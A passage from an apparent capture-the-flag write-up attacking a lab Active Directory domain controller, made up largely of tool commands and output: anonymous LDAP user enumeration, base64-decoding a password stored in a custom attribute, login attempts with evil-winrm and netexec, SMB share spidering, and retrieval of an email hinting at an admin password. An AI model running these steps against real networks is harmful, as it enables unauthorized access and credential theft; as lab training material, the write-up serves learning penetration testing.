sn: Goodhand
givenName: John
distinguishedName: CN=John Goodhand,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113014026.0Z
whenChanged: 20200115215154.0Z
displayName: John Goodhand
uSNCreated: 65614
uSNChanged: 118848
name: John Goodhand
objectGUID: 7TACWgpE/kqlMHRot3JgpQ==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132233532260320793
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFYgQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: j.goodhand
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113014026.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "a.turnbull"
[+] Using DN: CN=Adrian Turnbull,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Adrian Turnbull
sn: Turnbull
givenName: Adrian
distinguishedName: CN=Adrian Turnbull,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113014313.0Z
whenChanged: 20200113034534.0Z
displayName: Adrian Turnbull
uSNCreated: 65635
uSNChanged: 94281
name: Adrian Turnbull
objectGUID: PkhsX7HK0UKVFdwqFTWrnQ==
userAccountControl: 66080
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132233533933579732
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFZAQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: a.turnbull
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113015223.0Z
dSCorePropagationData: 16030216172521.0Z
msDS-SupportedEncryptionTypes: 0
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "e.crowe"
[+] Using DN: CN=Edward Crowe,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Edward Crowe
sn: Crowe
givenName: Edward
distinguishedName: CN=Edward Crowe,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113034502.0Z
whenChanged: 20200128180707.0Z
displayName: Edward Crowe
uSNCreated: 94274
uSNChanged: 245840
name: Edward Crowe
objectGUID: spB7cioaike11C+BNt/oVg==
userAccountControl: 66050
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132233607021669462
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFZwQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: e.crowe
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113034502.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "b.hanson"
[+] Using DN: CN=Ben Hanson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ben Hanson
sn: Hanson
givenName: Ben
distinguishedName: CN=Ben Hanson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113163539.0Z
whenChanged: 20200128180729.0Z
displayName: Ben Hanson
uSNCreated: 114734
uSNChanged: 245841
name: Ben Hanson
objectGUID: aiS9+OrNYE6UJnr8wuBpHg==
userAccountControl: 66050
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132234069391538655
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFaAQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: b.hanson
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113163539.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "d.burman"
[+] Using DN: CN=David Burman,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: David Burman
sn: Burman
givenName: David
distinguishedName: CN=David Burman,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113163612.0Z
whenChanged: 20200115215216.0Z
displayName: David Burman
uSNCreated: 114742
uSNChanged: 118852
name: David Burman
objectGUID: UqmXwgkl/0iy14P121+N7A==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132234069729591249
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFaQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: d.burman
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163628.0Z
dSCorePropagationData: 20200113163613.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "BackupSvc"
[+] Using DN: CN=BackupSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: BackupSvc
givenName: BackupSvc
distinguishedName: CN=BackupSvc,OU=Services,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113163703.0Z
whenChanged: 20200113163732.0Z
displayName: BackupSvc
uSNCreated: 114757
uSNChanged: 114765
name: BackupSvc
objectGUID: /AeVxvZYJ0S4xu2RXKx+KA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132234070231912131
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFagQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: BackupSvc
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113163703.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "j.allen"
[+] Using DN: CN=Joseph Allen,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Joseph Allen
sn: Allen
givenName: Joseph
distinguishedName: CN=Joseph Allen,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200113172359.0Z
whenChanged: 20200115215149.0Z
displayName: Joseph Allen
uSNCreated: 114807
uSNChanged: 118847
name: Joseph Allen
objectGUID: HEPoVWJubkGd3J25ACGaRA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132234098399165604
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFbgQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: j.allen
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200113172359.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "i.croft"
[+] Using DN: CN=Ian Croft,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ian Croft
sn: Croft
givenName: Ian
distinguishedName: CN=Ian Croft,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200115214621.0Z
whenChanged: 20200128180700.0Z
displayName: Ian Croft
uSNCreated: 118835
uSNChanged: 245839
name: Ian Croft
objectGUID: nRdObhMYfkOzzZt2y5gHxw==
userAccountControl: 66050
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
scriptPath: MapDataDrive.vbs
pwdLastSet: 132235983818652005
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFbwQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: i.croft
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200117033736.0Z
dSCorePropagationData: 20200117001404.0Z
dSCorePropagationData: 20200115214621.0Z
dSCorePropagationData: 16010101000417.0Z
[*] Bye!
jbrown@Jabaris-MacBook-Pro windapsearch %
Reviewing the LDAP output more closely, something immediately catches my attention.
A custom attribute: cascadeLegacyPwd.
That’s not standard.
And when I look at it, it appears to reveal a password tied to the user r.thompson.
This is exactly why we go back to enumeration.
[*] Bye!
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.42.114
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=cascade,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Searching for matching DNs for term: "r.thompson"
[+] Using DN: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=localobjectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: Ryan Thompson
sn: Thompson
givenName: Ryan
distinguishedName: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
instanceType: 4
whenCreated: 20200109193126.0Z
whenChanged: 20200323112031.0Z
displayName: Ryan Thompson
uSNCreated: 24610
memberOf: CN=IT,OU=Groups,OU=UK,DC=cascade,DC=local
uSNChanged: 295010
name: Ryan Thompson
objectGUID: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: [email protected]
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
Looks like we’ve got what appears to be a hashed password — not plaintext.
Before we try cracking it, we need to identify what type of hash we’re looking at. , i like to use this site https://hashes.com/en/tools/hash_identifier:
Press enter or click to view image in full size
If it’s Base64 encoded, that’s not a hash algorithm — that’s just an encoding format.
Which means this might not even be a “hash” in the traditional sense.
Base64 is reversible.
So instead of thinking cracking, we think decoding.
You can easily decode it using your native OS tools (Linux, macOS, even Windows PowerShell). Just take the string and decode it — no brute force required.
jbrown@Jabaris-MacBook-Pro cascade % echo "clk0bjVldmE=" | base64 -d
rY4n5eva% Now that we may have valid credentials, we can attempt to authenticate over WinRM.
Since WinRM is exposed on port 5985, this gives us a potential remote management path into the machine.
We can try connecting as r.thompson using evil-winrm.
jbrown@Jabaris-MacBook-Pro evil-winrm % ./evil-winrm.rb -i 10.129.42.114 -u r.thompson -p rY4n5eva
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/fragment.rb:35: warning: redefining 'object_id' may cause serious problems
/opt/homebrew/lib/ruby/gems/4.0.0/gems/winrm-2.3.9/lib/winrm/psrp/message_fragmenter.rb:29: warning: redefining 'object_id' may cause serious problems Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method 'quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\> ls
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
It would be too easy if WinRM just let us straight in.
But that’s fine.
We have credentials now — and that changes everything.
If WinRM doesn’t allow us access, we pivot.
Since SMB is running on 445, we can go back and try authenticating with r.thompson’s creds.
Earlier, anonymous login failed.
But authenticated SMB is a completely different story.
jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.42.114 -u r.thompson -p rY4n5eva
SMB 10.129.42.114 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.42.114 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
jbrown@Jabaris-MacBook-Pro evil-winrm %That’s what we like to see — successful authentication.
jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.42.114 -u r.thompson -p rY4n5eva --shares
SMB 10.129.42.114 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.42.114 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SMB 10.129.42.114 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.42.114 445 CASC-DC1 Share Permissions Remark
SMB 10.129.42.114 445 CASC-DC1 ----- ----------- ------
SMB 10.129.42.114 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.42.114 445 CASC-DC1 Audit$
SMB 10.129.42.114 445 CASC-DC1 C$ Default share
SMB 10.129.42.114 445 CASC-DC1 Data READ
SMB 10.129.42.114 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.42.114 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.42.114 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.42.114 445 CASC-DC1 SYSVOL READ Logon server share
jbrown@Jabaris-MacBook-Pro evil-winrm %jbrown@Jabaris-MacBook-Pro evil-winrm % nxc smb 10.129.42.114 -u r.thompson -p rY4n5eva -M spider_plus
SMB 10.129.42.114 445 CASC-DC1 [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.129.42.114 445 CASC-DC1 [+] cascade.local\r.thompson:rY4n5eva
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] DOWNLOAD_FLAG: False
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] STATS_FLAG: True
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] OUTPUT_FOLDER: /Users/jbrown/.nxc/modules/nxc_spider_plus
SMB 10.129.42.114 445 CASC-DC1 [*] Enumerated shares
SMB 10.129.42.114 445 CASC-DC1 Share Permissions Remark
SMB 10.129.42.114 445 CASC-DC1 ----- ----------- ------
SMB 10.129.42.114 445 CASC-DC1 ADMIN$ Remote Admin
SMB 10.129.42.114 445 CASC-DC1 Audit$
SMB 10.129.42.114 445 CASC-DC1 C$ Default share
SMB 10.129.42.114 445 CASC-DC1 Data READ
SMB 10.129.42.114 445 CASC-DC1 IPC$ Remote IPC
SMB 10.129.42.114 445 CASC-DC1 NETLOGON READ Logon server share
SMB 10.129.42.114 445 CASC-DC1 print$ READ Printer Drivers
SMB 10.129.42.114 445 CASC-DC1 SYSVOL READ Logon server share
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [+] Saved share-file metadata to "/Users/jbrown/.nxc/modules/nxc_spider_plus/10.129.42.114.json".
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] SMB Shares: 8 (ADMIN$, Audit$, C$, Data, IPC$, NETLOGON, print$, SYSVOL)
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] SMB Readable Shares: 4 (Data, NETLOGON, print$, SYSVOL)
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] SMB Filtered Shares: 1
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] Total folders found: 58
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] Total files found: 20
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] File size average: 1.07 KB
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] File size min: 6 B
SPIDER_PLUS 10.129.42.114 445 CASC-DC1 [*] File size max: 5.83 KBjbrown@Jabaris-MacBook-Pro cascade % cat 10.129.42.114.json
{
"Data": {
"IT/Email Archives/Meeting_Notes_June_2018.html": {
"atime_epoch": "2020-01-15 20:08:46",
"ctime_epoch": "2020-01-15 20:08:46",
"mtime_epoch": "2020-01-28 13:00:30",
"size": "2.46 KB"
},
"IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log": {
"atime_epoch": "2020-01-10 11:19:20",
"ctime_epoch": "2020-01-10 11:19:20",
"mtime_epoch": "2020-01-28 20:19:11",
"size": "1.27 KB"
},
"IT/Logs/DCs/dcdiag.log": {
"atime_epoch": "2020-01-10 11:17:30",
"ctime_epoch": "2020-01-10 11:17:30",
"mtime_epoch": "2020-01-26 17:22:05",
"size": "5.83 KB"
},
"IT/Temp/s.smith/VNC Install.reg": {
"atime_epoch": "2020-01-28 14:27:43",
"ctime_epoch": "2020-01-28 14:27:43",
"mtime_epoch": "2020-01-28 15:00:01",
"size": "2.62 KB"
}
},
"NETLOGON": {
"MapAuditDrive.vbs": {
"atime_epoch": "2020-01-15 16:45:08",
"ctime_epoch": "2020-01-15 16:45:08",
"mtime_epoch": "2020-01-15 16:50:14",
"size": "258 B"
},
"MapDataDrive.vbs": {
"atime_epoch": "2020-01-15 16:50:28",
"ctime_epoch": "2020-01-15 16:49:19",
"mtime_epoch": "2020-01-15 16:51:03",
"size": "255 B"
}
},
"SYSVOL": {
"cascade.local/Policies/{2906D621-7B58-40F1-AA47-4ED2AEF29484}/GPT.INI": {
"atime_epoch": "2020-01-09 13:12:59",
"ctime_epoch": "2020-01-09 13:12:59",
"mtime_epoch": "2020-01-09 13:13:00",
"size": "59 B"
},
"cascade.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI": {
"atime_epoch": "2020-01-09 10:31:40",
"ctime_epoch": "2020-01-09 10:31:40",
"mtime_epoch": "2020-03-23 04:33:59",
"size": "23 B"
},
"cascade.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2020-01-09 10:31:40",
"ctime_epoch": "2020-01-09 10:31:40",
"mtime_epoch": "2020-03-23 04:33:59",
"size": "1.22 KB"
},
"cascade.local/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol": {
"atime_epoch": "2020-01-09 10:48:03",
"ctime_epoch": "2020-01-09 10:48:03",
"mtime_epoch": "2020-01-09 10:48:03",
"size": "2.72 KB"
},
"cascade.local/Policies/{322FEA29-156D-4476-8A06-1935A3525C1C}/GPO.cmt": {
"atime_epoch": "2020-01-09 13:29:34",
"ctime_epoch": "2020-01-09 13:29:34",
"mtime_epoch": "2020-01-09 13:30:29",
"size": "24 B"
},
"cascade.local/Policies/{322FEA29-156D-4476-8A06-1935A3525C1C}/GPT.INI": {
"atime_epoch": "2020-01-09 10:50:16",
"ctime_epoch": "2020-01-09 10:50:16",
"mtime_epoch": "2020-01-28 17:07:51",
"size": "64 B"
},
"cascade.local/Policies/{322FEA29-156D-4476-8A06-1935A3525C1C}/User/Scripts/scripts.ini": {
"atime_epoch": "2020-01-09 14:52:44",
"ctime_epoch": "2020-01-09 14:52:44",
"mtime_epoch": "2020-01-28 17:07:51",
"size": "6 B"
},
"cascade.local/Policies/{4026EDF8-DBDA-4AED-8266-5A04B80D9327}/GPT.INI": {
"atime_epoch": "2020-01-09 14:42:31",
"ctime_epoch": "2020-01-09 14:42:31",
"mtime_epoch": "2020-01-09 14:42:31",
"size": "59 B"
},
"cascade.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI": {
"atime_epoch": "2020-01-09 10:31:40",
"ctime_epoch": "2020-01-09 10:31:40",
"mtime_epoch": "2020-01-26 12:12:15",
"size": "23 B"
},
"cascade.local/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/MACHINE/Microsoft/Windows NT/SecEdit/GptTmpl.inf": {
"atime_epoch": "2020-01-09 10:31:40",
"ctime_epoch": "2020-01-09 10:31:40",
"mtime_epoch": "2020-01-26 12:12:15",
"size": "3.99 KB"
},
"cascade.local/Policies/{820E48A7-D083-4C2D-B5F8-B24462924714}/GPT.INI": {
"atime_epoch": "2020-01-09 13:33:51",
"ctime_epoch": "2020-01-09 13:33:51",
"mtime_epoch": "2020-01-09 13:34:03",
"size": "59 B"
},
"cascade.local/Policies/{D67C2AD5-44C7-4468-BA4C-199E75B2F295}/GPT.INI": {
"atime_epoch": "2020-01-09 14:42:40",
"ctime_epoch": "2020-01-09 14:42:40",
"mtime_epoch": "2020-01-09 14:42:40",
"size": "59 B"
},
"cascade.local/scripts/MapAuditDrive.vbs": {
"atime_epoch": "2020-01-15 16:45:08",
"ctime_epoch": "2020-01-15 16:45:08",
"mtime_epoch": "2020-01-15 16:50:14",
"size": "258 B"
},
"cascade.local/scripts/MapDataDrive.vbs": {
"atime_epoch": "2020-01-15 16:50:28",
"ctime_epoch": "2020-01-15 16:49:19",
"mtime_epoch": "2020-01-15 16:51:03",
"size": "255 B"
}
}
}% jbrown@Jabaris-MacBook-Pro cascade %When we try grabbing the file directly with netexec, we get an Access Denied.
That usually means one of two things:
- The share is accessible, but file-level permissions are restricted.
- The tool isn’t handling the interaction the way we need it to.
So instead of forcing it, we pivot tools.
Let’s use Impacket’s smbclient.py.
This gives us a more interactive SMB session — similar to traditional smbclient
jbrown@Jabaris-MacBook-Pro examples % python3 smbclient.py cascade.local/r.thompson:[email protected]
Impacket v0.14.0.dev0+20260219.104542.8728bbcf - Copyright Fortra, LLC and its affiliated companies # ls
[-] No share selected
# use data
# ls
drw-rw-rw- 0 Tue Jan 28 17:05:51 2020 .
drw-rw-rw- 0 Tue Jan 28 17:05:51 2020 ..
drw-rw-rw- 0 Sun Jan 12 20:45:14 2020 Contractors
drw-rw-rw- 0 Sun Jan 12 20:45:10 2020 Finance
drw-rw-rw- 0 Tue Jan 28 13:04:51 2020 IT
drw-rw-rw- 0 Sun Jan 12 20:45:20 2020 Production
drw-rw-rw- 0 Sun Jan 12 20:45:16 2020 Temps
# cd IT
# ls
drw-rw-rw- 0 Tue Jan 28 13:04:51 2020 .
drw-rw-rw- 0 Tue Jan 28 13:04:51 2020 ..
drw-rw-rw- 0 Tue Jan 28 13:00:30 2020 Email Archives
drw-rw-rw- 0 Tue Jan 28 13:04:51 2020 LogonAudit
drw-rw-rw- 0 Tue Jan 28 19:53:04 2020 Logs
drw-rw-rw- 0 Tue Jan 28 17:06:59 2020 Temp
# cd Email Archives
# ls
drw-rw-rw- 0 Tue Jan 28 13:00:30 2020 .
drw-rw-rw- 0 Tue Jan 28 13:00:30 2020 ..
-rw-rw-rw- 2522 Tue Jan 28 13:00:30 2020 Meeting_Notes_June_2018.html
# get Meeting_Notes_June_2018.html
# exit
jbrown@Jabaris-MacBook-Pro cascade % cat Meeting_Notes_June_2018.html
<html>
<body lang=EN-GB link=blue vlink=purple style='tab-interval:36.0pt'><div class=WordSection1>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>From:<span style='mso-tab-count:
1'>???????????????????????????????????????? </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>Steve Smith
<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>To:<span style='mso-tab-count:
1'>?????????????????????????????????????????????? </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>IT (Internal)<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>Sent:<span style='mso-tab-count:
1'>?????????????????????????????????????????? </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>14 June 2018 14:07<o:p></o:p></span></p>
<p class=MsoNormal style='margin-left:120.0pt;text-indent:-120.0pt;tab-stops:
120.0pt;mso-layout-grid-align:none;text-autospace:none'><b><span
style='mso-bidi-font-family:Calibri;color:black'>Subject:<span
style='mso-tab-count:1'>???????????????????????????????????? </span></span></b><span
style='mso-bidi-font-family:Calibri;color:black'>Meeting Notes<o:p></o:p></span></p>
<p><o:p> </o:p></p>
<p>For anyone that missed yesterday?s meeting (I?m looking at
you Ben). Main points are below:</p>
<p class=MsoNormal><o:p> </o:p></p>
<p>-- New production network will be going live on
Wednesday so keep an eye out for any issues. </p>
<p>-- We will be using a temporary account to
perform all tasks related to the network migration and this account will be deleted at the end of
2018 once the migration is complete. This will allow us to identify actions
related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password). </p>
<p>-- The winner of the ?Best GPO? competition will be
announced on Friday so get your submissions in soon.</p>
<p class=MsoNormal><o:p> </o:p></p>
<p class=MsoNormal>Steve</p>
</div>
</body>
</html>% jbrown@Jabaris-MacBook-Pro cascade %
Out of that entire file, one line stands out:
“Username is TempAdmin (password is the same as the normal admin account password)”
That’s not just a note.
That’s a breadcrumb.
Now we potentially have a privileged account — TempAdmin — but the key detail is that its password matches the “normal admin” account.
Since we already have access to the Data share, let’s comb through everything:
Data": {
"IT/Email Archives/Meeting_Notes_June_2018.html": {
"atime_epoch": "2020-01-15 20:08:46",
"ctime_epoch": "2020-01-15 20:08:46",
"mtime_epoch": "2020-01-28 13:00:30",
"size": "2.46 KB" <- already got this one
},
"IT/Logs/Ark AD Recycle Bin/ArkAdRecycleBin.log": {
"atime_epoch": "2020-01-10 11:19:20",
"ctime_epoch": "2020-01-10 11:19:20",
"mtime_epoch": "2020-01-28 20:19:11",
"size": "1.27 KB"
},
"IT/Logs/DCs/dcdiag.log": {
"atime_epoch": "2020-01-10 11:17:30",
"ctime_epoch": "2020-01-10 11:17:30",
"mtime_epoch": "2020-01-26 17:22:05",
